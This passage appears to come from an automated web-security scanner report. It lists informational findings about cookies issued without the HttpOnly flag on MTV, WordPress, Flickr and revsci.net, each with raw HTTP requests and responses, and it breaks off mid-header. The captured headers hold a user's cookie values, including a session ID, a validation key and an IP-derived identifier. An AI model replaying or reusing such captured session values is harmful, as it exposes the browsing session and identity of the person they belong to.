Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65; ReturnUrl=http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com; MasterAuthIsRequested=true

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Tue, 12 Jun 2012 20:58:34 GMT
Last-Modified: Mon, 13 Jun 2011 20:58:34 GMT
Server: Microsoft-IIS/7.0
Server: w07w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Content-Length: 21551
Date: Tue, 14 Jun 2011 00:28:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

...var Page_ValidationVer = "125";
var Page_IsValid = true;
var Page_BlockSubmit = false;
var Page_InvalidControlToBeFocused = null;
function ValidatorUpdateDisplay(val) {
if (typeof(val.disp
...[SNIP]...
12.23. http://community.mtv.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=zHTTM5tz2u78OZ9GtqYcSQ2&t=634138886688453038 HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65; ReturnUrl=http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com; MasterAuthIsRequested=true

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Tue, 12 Jun 2012 06:43:45 GMT
Last-Modified: Fri, 09 Jul 2010 05:04:34 GMT
Server: Microsoft-IIS/7.0
Server: w07w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Content-Length: 21725
Date: Tue, 14 Jun 2011 00:28:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...
12.24. http://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wordpress.com
Path:   /signup/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup/?ref=bottomtext HTTP/1.1
Host: en.wordpress.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 14 Jun 2011 00:31:10 GMT
Content-Type: text/html
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Set-Cookie: ref=bottomtext; path=/; domain=wordpress.com
Location: https://en.wordpress.com/signup/
Vary: Accept-Encoding
Content-Length: 0

12.25. http://flickr.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flickr.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: flickr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 302 Found
Date: Tue, 14 Jun 2011 00:23:05 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:05 GMT; path=/; domain=.flickr.com
location: http://www.flickr.com/
X-Served-By: www55.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.26. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07608 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzUJZjpr3tvXN5oCW8iE3o5lcCzapr7ZyPuzNqEiwsqAs3Z5CT4uCSvFPNQT0hWb+Ql7PLFkrHPAMBJEo8+CkW6yZjLuUwUDDGjJbUeoctczcWYDPi1co/UrWk+TMrIYVFaVlL1f/I1es2gigmjI4FoB644gHJSv8ywcjnyWu9H1qcq4/KgDv7jT4l6HLBoL9mlZmIFDULYF30VFqS9iKgTxNb5I+i0fFWGJT9f7sr0idgWhgiS4mXOfDq3aB46SMfm3ZRQ5fFaWV+95sPMNVUDZWYcqKbr9kVhlQKIKWOGTSV0vOQyWYF7ubKYkaWarYa2dI++2rB+2rl7wGE2LJlxZzF/juUKMEt6FABNvEtf/qhAkjq9eJ5IADHfRkoUTfuIBvds5S3DEr5mYmBk+Apz1PPsClTtHxRDOFlSRcDEv1wH6VNa+ki8I2nSSEqyVuB7LNduVG4PA8V7TxGNyxJVFRu4YwI9UehDB5UDx6RGLe0FmPuNMd8e7K7TQnbhVAQxUnLFQn6Ii1mwBDQeb3Uq1Zu3F2wIxOTz+jpG4jOG+LWWYDyYCsIHC9p1g0b+GmEUm8lUKR9yEvewLaFLR1m21EnT/MbUFivgKAszsmcA5zu/WgTtgEYhKwu20XGcEUhQMJ1Y5Kic5oH920rTK3RGHpLjXbwtgtNZqzTDvB58Q6b59slhpT11735wwv8G0Oo0BprsyhGYi8CsOz3PRCE4B/EzwCh4/ODdgun/LXdPMd6rWgDCoYf1Yf6ySHlcPvLFqpYvF4iT2c0k2m5LKUR87oInvBtChPLnLfHzpYtVOcP2lL+sGlPgezgm6tz+Nqo/ezeRR35eQ8TW6X1qW3UyjhlZU8YsCGj5fpA59zHKSXX22XDarighLu7tHyJX//083MZD7ViaS5T9nioSmnSRSCxiHJ6m3hv+77QHHBrSVnbVasAFdhBzrV9NMkTOe01D+7D++gOCMTT9kawU2P6TU64dVQ4OmUp/Z7K9/32TvfZ7HpQ7/sLr1aNNgh6dyZ9v8HgvncVNuk9zGFtkmnsD9Pkcco+e6EzPGlVnRzFXnJYCkiss4DShHiSg2BogjsbxHeaXEG+W67RFbZV2oxnDuimimm/HM8kilggj+OFaf/qq7tRERvg5pg1FHxhW10mkrhl1nmwscrAHLZBTQqKcky4S0zbzLqJebiuS9dkKTI5DDWLOWhgSFXWe7KigsFgL+mQtJ1o978mcSFvXlHa/a0Tn2Vu5eFfpk5lS0Ih+rFfctHKxSm3u1j8DPmj8S1tqWZ9QvVzReIUJrMk5fOnN8Vqb/H3V3D4ZROw3sbjcYtSgqximbxQfQSj3lIisX2t72VUa1r1Zs1aTMDK1ZcwAXrqio8fTEq5AssvxURgczC5+RAhu9oUwBS6Tb8wl70h4xV5Th9OakL0D1SUsz0xz9CVILvwIDLb0m5Ayf1H7maqNBLHW0pvH3pvLze9Rd+Kb9mq7F5LGa0zzQq0HRkMdgLkO0mCRtv9p5Q2AcIbwFr9thI6XR7IXNML3UeMIY2Axy1Wn1pcsnWQGgwbj8JZ9MhQtL+9OGHZeuFXoGqSPzVgFcCMf+YeFuCkNYhko2nLdHkEButXE3cwD9UPwrpd8KjXWIxmqkN0cNoHKxc2aZWiZ1NiVrqHqpif7KcNBwHl4WFFsrRB1RskjRoztAw0fVZg8TYBwhewZmaJPKU0rM8lceRMYvFDAyNUAbc/RsuG8E7JsBNn7r64w9W7ZI9DosKWm2SGlHQLqDcK9ZKWKcadoRzYI=; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:54 